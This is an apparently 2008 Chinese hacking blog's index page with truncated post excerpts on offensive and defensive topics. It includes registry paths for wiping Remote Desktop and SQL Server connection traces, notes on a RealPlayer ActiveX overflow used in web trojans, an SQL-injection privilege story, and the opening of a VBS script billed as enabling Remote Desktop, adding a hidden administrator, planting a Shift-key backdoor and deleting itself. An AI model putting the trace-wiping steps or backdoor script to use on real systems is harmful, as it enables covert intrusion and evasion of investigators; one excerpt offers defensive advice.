Network Security Pub

个人档案

j14n
男
美国纽约
上次登录：
2008年 8月

加为好友

送他礼物

发送消息

文章分类

　【留.言.版】

友情链接

最近访客



宋灵锡	fdca6431
柳飘飘柳	c0vv
了而了之	ー夜纏綿〞
北京工商服务网	扯淡的微笑_

文章列表

清除本机记录 by monk

2008-07-14 16:32

1.清除3389登录记录

HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default

2.清除sql查询分析器连接记录

注册表,SQL2000版本
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers

3.清除浏览器临时文件夹，历史记录

4.清除windows缓存文件，temp文件夹

类别：〖黑客&攻防〗 | 评论(1) | 浏览()

网马漏洞CLSID大全

2008-05-24 19:20

记性不太好,有时候遇到挂马看clsid不知道是什么漏洞.网络巡警超级巡警懒人小G 余弦函数等的博客或者主页上搜集了几个供自己查询 ^_^ 本来想一个链接一下的后来想象也许自己去搜索这些高手的博客获得的可能会更多要查看详细的大家自己动手吧 ^_^
RealPlayer播放列表处理栈溢出漏洞
RealPlayer 播放器中的MPAMedia.dll 提供的数据库组件，在处理播放列表名时存在栈溢出漏洞，可以使用ierpplug.dll提供的IERPCtl ActiveX 控件导入一个特殊的播放列表让RealPlayer读取，病毒作者可以通过构造包含此漏洞触发代码的恶意网页，当用

阅读全文>>

类别：〖黑客&攻防〗 | 评论(2) | 浏览()

最近流行的14种第三方0day挂马防御措施

2008-02-22 16:40

14种常见软件的0day防御措施：
RealPlayer,暴风影音,PPStream,迅雷,联众世界,百度搜霸工具条,Adobe Reader,Qvod player,腾讯QQ,PPLive,Flash player,Skype ,QuickTime,超星阅读器！

【RealPlayer】
1. 漏洞说明
RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表，因此如果用户受骗访问了恶意

阅读全文>>

类别：〖黑客&攻防〗 | 评论(1) | 浏览()

解开SA注入无法拿到系统权限的困惑

2008-01-31 20:17

以前经常看到一句话，据说是牛人说的：SA注入拿不到系统权限就是水平问题！前几天遇到的情况足以推翻这句所谓我名言！SA注入点在很多种情况下是相对比较容易拿一点，但是不是说有SA就有系统权限呢，其实不然！SA下不能拿到系统权限的情况也比较多，我就简单的说明一下我前几天遇到的情况，至于其他方面大家提出共同研究就是了，嘿嘿。

几天前朋友把一个SA注入点发在群里，说他实在是拿不到系统权限。我问他什么环境，他说可以执行部分命令，也有回显，也可以列目录，WEB与DATA服务器并

阅读全文>>

类别：〖黑客&攻防〗 | 评论(0) | 浏览()

xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs

2008-01-31 18:53

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Serv

阅读全文>>

类别：〖黑客&攻防〗 | 评论(0) | 浏览()